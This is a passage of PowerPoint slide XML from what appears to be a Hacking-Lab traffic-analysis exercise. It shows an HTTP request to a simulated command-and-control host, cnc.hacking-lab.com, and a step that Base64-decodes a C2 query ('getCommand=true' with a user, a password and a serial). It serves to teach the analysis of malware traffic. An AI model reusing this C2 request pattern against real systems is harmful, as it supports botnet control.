              <a:t>/7.22.0 OpenSSL/0.9.8r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1400" strike="sngStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zlib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1400" strike="sngStrike" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/1.2.5 Host: cnc.hacking-lab.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" sz="1400" strike="sngStrike" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Accept: */*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SG" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SG" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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CE569-1E35-CEED-EB09-FCDEFE6CDD47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4336026"/>
            <a:ext cx="5083277" cy="18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F0EA86-174C-EE96-BBF0-E3941176C845}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2354826" y="5503606"/>
            <a:ext cx="1282454" cy="9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0E0FC-4C9F-F298-BE15-46A739ABF61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3643742"/>
            <a:ext cx="6690360" cy="112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70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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D049B76-7A51-5102-C476-307D5790BC2C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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b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gc.php</a:t>
            </a:r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c2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BB4FE-6335-7320-E35A-E3187CBD179F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1292902"/>
            <a:ext cx="9144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Step 6:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Search for an online Base64 decoder. This is just one of the many online decoders.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.base64decode.org/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Paste the random string into the decoder and you get the next layer of information! The serial number!	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>getCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>true&amp;user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WxTrFk&amp;pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>secure&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>serial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=wxpUID33125523</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG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8EC5C-62A9-4276-A28E-3D484B826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6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1782834" y="2708675"/>
            <a:ext cx="5624052" cy="4149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ECF69-6BCA-60D4-DC85-37B39CF79EB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1851660" y="6433794"/>
            <a:ext cx="3421625" cy="243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65567-3631-B7F9-EDE9-740EC83F501E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1851660" y="4001336"/>
            <a:ext cx="4129548" cy="31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65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46FDA1-4337-409F-8F8C-421C8BF6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" y="1087254"/>
            <a:ext cx="8061012" cy="46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7" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="97b7b39c79afe89679479fe853b6756a">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="06a747f4-cc58-46f4-be8e-9fad730b78a9" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="3d42b3f95ab3521a753d45bdbad46bcc" ns2:_="">
    <xsd:import namespace="06a747f4-cc58-46f4-be8e-9fad730b7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47f4-cc58-46f4-be8e-9fad730b7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5D226E-7D9E-4BB1-B9E9-643D42AF98BB}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{E0966B6E-5D6F-42F3-856A-6A419A3A189D}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{E3DF8979-1B0B-4CD8-BD84-95B080FAB33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14555</TotalTime>
  <Words>576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QUEK</cp:lastModifiedBy>
  <cp:revision>614</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-06-26T03:31:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-10T03:34:25Z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0x010100E2A1EFFD0C249D47B4893D477918E08F</vt:lpwstr>
  </property>
</Properties>
</file>